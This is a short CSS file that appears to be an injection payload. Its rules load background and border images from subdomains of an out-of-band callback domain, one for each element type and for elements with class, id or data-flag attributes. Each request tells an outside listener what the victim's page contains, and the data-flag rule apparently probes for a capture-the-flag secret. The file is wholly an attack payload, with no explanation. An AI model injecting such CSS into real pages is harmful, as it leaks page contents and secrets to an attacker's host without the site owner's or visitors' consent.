body { background-image: url("http://csshit.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/body-bg") !important; }
code { background-image: url("http://codeelem.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/code-bg") !important; }
h1 { background-image: url("http://h1elem.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/h1-bg") !important; }
p { background-image: url("http://pelem.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/p-bg") !important; }
div { background-image: url("http://divelem.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/div-bg") !important; }
main { background-image: url("http://mainelem.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/main-bg") !important; }
[class] { border-image: url("http://hasclass.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[id] { border-image: url("http://hasid.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
[data-flag] { border-image: url("http://dataflag.da7d01umtsrjn9sgh7s0in9hs1r87k9ik.oast.fun/x") !important; }
* { font-family: serif !important; }
